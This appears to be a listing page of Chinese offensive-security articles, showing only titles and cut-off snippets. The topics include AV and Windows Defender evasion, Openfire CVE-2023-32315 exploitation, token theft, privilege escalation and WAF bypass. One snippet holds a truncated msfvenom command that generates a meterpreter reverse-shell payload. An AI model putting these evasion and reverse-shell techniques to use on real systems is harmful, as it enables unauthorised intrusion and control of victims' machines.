前言1,弱口令发现目标网站,为宝塔搭建的dedecms,于是自己服务器搭建同样的2 get请求phpinfo() 有waf,上传文件有waf3,寻找资料,发现是,宝塔的ngix防火墙。同样在自己的服务...
漏洞复现CVE-2023-32315 Openfire权限绕过利用
0x01 阅读须知融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统...
绕过Windows Defender的10种方法|Bypass
介绍在这篇文章中,我将解释 10 种方法/技术来绕过具有最新 Windows Defender intel 的完全更新的 Windows 系统,以执行不受限制的代码(除了权限/访问控制列表)。测试环境...
AV-Bypass-Learning - 免杀学习笔记
shellcode免杀的常用手法,实现绕过常见AV的效果python部分代码来源于奇安信攻防社区文章:https://forum.butian.net/share/1690 作者:St3pBy通过组合...
【横向移动】SharpToken - Windows 令牌窃取
关注我们 | 发现更多精彩内容 在红队横向移动的过程中,我们经常需要窃取其他用户的权限。在现代 EDR 的防御下,我们很难使用 Mimikatz 获取其他用户的权限,如果目标用户没有活着的进程,我们也...
神兵利器 | Potato土豆提权工具Bypass防护思路(附下载)
0x01 常规利用 前段时间在群里看到有人在搜集“土豆”系列的提权工具,抽空整理了下之前用过的一些,还有最近刚放出的DCOMPotato,仅分享给有需要的人。 当然,除了可以利用“土豆”系列的提权工具...
分享 | 红队杀软Bypass指南v1
简单介绍 包含一下基础技术的好用参考链接和工具库地址,如各种语言的加载器: 混淆工具,常用命令等: 进程注入,检测沙箱等: 免责声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信...
Bypass360 | 工具(近期更新)
0x01 工具介绍 绕过360工具。 0x02 安装与使用 1、生成shellcode: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1...
工具开发|目录扫描器dirsearch添加 403绕过
前言 在前几天下着大暴雨的晚上,刷着哔站看着鬼畜,突然刷到一个漏洞赏金src系列-403绕过的视频,突发灵感:想着目录扫描器dirsearch中加上403绕过。这件事情真的是泰裤辣! 运行流程 dir...
风暴免杀工具 StormBypassAV
=================================== 免责声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,...
一次失败的SQL注入经历渗透测试
0x00 前言0x01 WAF识别0x02 篇章: Bypassed0x2.1 漏洞证明0x2.2 无限制注入0x03 后续:无疾而终0x04 总结某天,聚合扫描器推送了一份SQL注入的漏洞报告,经过...
Windows版宝塔bypass到RDP登录
声明本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!01 背景在一次攻防演练中,利用漏洞获取到一个webshell,站点是php的,最后发现这个webshell的权限竟然是s...
42